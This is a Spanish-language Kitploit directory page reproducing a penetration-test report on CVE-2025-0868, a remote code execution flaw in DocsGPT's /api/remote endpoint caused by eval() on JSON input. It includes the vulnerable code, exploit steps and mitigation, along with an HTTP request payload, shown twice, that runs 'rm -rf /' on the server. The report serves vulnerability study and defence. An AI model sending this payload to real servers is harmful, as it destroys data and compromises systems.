Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-0868 — Informe detallado de pruebas de penetración y demostración de exploit para CVE-2025-0868, un RCE crítico en DocsGPT mediante eval() inseguro, que incluye configuración de laboratorio, creación de payloads y estrategias de mitigación. | Kitploit
Herramientas/GitHubGitHub/aidana-gift/cve-2025-0868
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubaidana-gift/cve-2025-0868

CVE-2025-0868

Informe detallado de pruebas de penetración y demostración de exploit para CVE-2025-0868, un RCE crítico en DocsGPT mediante eval() inseguro, que incluye configuración de laboratorio, creación de payloads y estrategias de mitigación.

Ver Repositorio
112hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Informe de Proyecto de Pruebas de Penetración: Explotación de CVE-2025-0868 (DocsGPT RCE mediante Eval JSON)

1. Introducción

El 20 de febrero de 2025 se reveló una vulnerabilidad crítica de ejecución remota de código (RCE) (CVE-2025-0868) en la biblioteca de código abierto DocsGPT, causada por el uso inseguro de eval() al analizar cargas útiles JSON.

Detalles clave:

  • Afecta a las versiones 0.8.1 a 0.12.0 de DocsGPT
  • Puntuación CVSS 4.0 de 9.3 (CRÍTICA)
  • Permite la inyección de código sin autenticación y accesible desde la red
  • Impacto total en la confidencialidad, integridad y disponibilidad

Acerca de CVE-2025-0868

Esta vulnerabilidad permite a los atacantes ejecutar código Python arbitrario a través del endpoint /api/remote. DocsGPT es una herramienta de IA generativa de código abierto que permite consultar documentación de proyectos utilizando modelos GPT.

Objetivos del proyecto

  • Analizar los antecedentes técnicos de la vulnerabilidad
  • Reproducirla en un entorno de laboratorio controlado
  • Demostrar el impacto de la explotación
  • Proponer estrategias de mitigación
  • Presentar conclusiones

  • 2. Análisis de la Vulnerabilidad

    2.1 Resumen de la Vulnerabilidad

    CategoríaDetalles
    ID de CVECVE-2025-0868
    Software afectadoDocsGPT v0.8.1 – v0.12.0
    Tipo de vulnerabilidadEjecución Remota de Código (RCE)
    Vector de ataqueBasado en red (solicitud HTTP a /api/remote)
    Causa raízUso inseguro de eval() en entradas JSON no confiables
    ImpactoCompromiso total del servidor (ejecución arbitraria de comandos)
    Mapeo CWECWE-77: Neutralización incorrecta de elementos especiales utilizados en un comando

    2.2 Desglose de CVSS 4.0

    Vector: AV:N/AC:L/PR:N/UI:N/VC:H/VI:H/VA:H
    Puntuación base: 9.3 (CRÍTICA)

    Métricas de explotabilidad:

    • Vector de ataque (AV): Red (N)
    • Complejidad del ataque (AC): Baja (L)
    • Privilegios requeridos (PR): Ninguno (N)
    • Interacción del usuario (UI): Ninguna (N)

    Métricas de impacto:

    • Confidencialidad (VC): Alta
    • Integridad (VI): Alta
    • Disponibilidad (VA): Alta

    2.3 Análisis técnico profundo

    La vulnerabilidad existe en reddit_loader.py donde la entrada del usuario se procesa utilizando la función insegura eval():

    root@kitploit:~
    def load_data(self, inputs):
        data = eval(inputs)  # Código vulnerable
        client_id = data.get("client_id")
        client_secret = data.get("client_secret")
        user_agent = data.get("user_agent")
    

    Esto permite a un atacante ejecutar código Python malicioso dentro de campos JSON: POST /api/remote HTTP/1.1 Content-Type: application/json

    {"data": "import('os').system('rm -rf /')"}

    Explotación de CVE-2025-0868 en DocsGPT

    3. Proceso de Explotación

    3.1 Configuración del Entorno de Laboratorio

    Para explotar esta vulnerabilidad, recreamos el entorno vulnerable y un espacio de trabajo seguro utilizando:

    • Máquina virtual: Kali Linux 2024
    • Versión de DocsGPT: 0.12.0 (versiones vulnerables: 0.8.0 - 0.12.0)
    • Herramientas utilizadas: Python, Docker

    3.2 Desarrollo del Exploit

    Desarrollamos un script en Python que ejecuta Ejecución Remota de Código (RCE) mediante el envío de una carga útil maliciosa al endpoint /api/remote, explotando el uso inseguro de eval().

    Pasos clave del exploit

    1. Reconocimiento: Identificar la versión de DocsGPT mediante cabeceras HTTP.
    2. Definir la vulnerabilidad: RCE en el endpoint /api/remote.
    3. Elaboración de la carga útil: Inyectar código Python.
    4. Explotación: Enviar JSON malicioso a /api/remote.

    Ejemplo de una solicitud vulnerable

    root@kitploit:~
    POST /api/remote HTTP/1.1
    Content-Type: application/json
    
    {"data": "__import__('os').system('rm -rf /')"}
    

    4. CONTRAMEDIDAS Y MITIGACIÓN

    4.1 Correcciones inmediatas

    Actualizar a DocsGPT v0.12.1 y versiones posteriores.

    4.2 Corrección de código

    Reemplazar eval() con json.loads().

    Enlace: https://github.com/arc53/DocsGPT/blob/df9d432d29c1bbdf28abb3d35d129060b1964dd3/application/parser/remote/reddit_loader.py#L9

    Descargar herramienta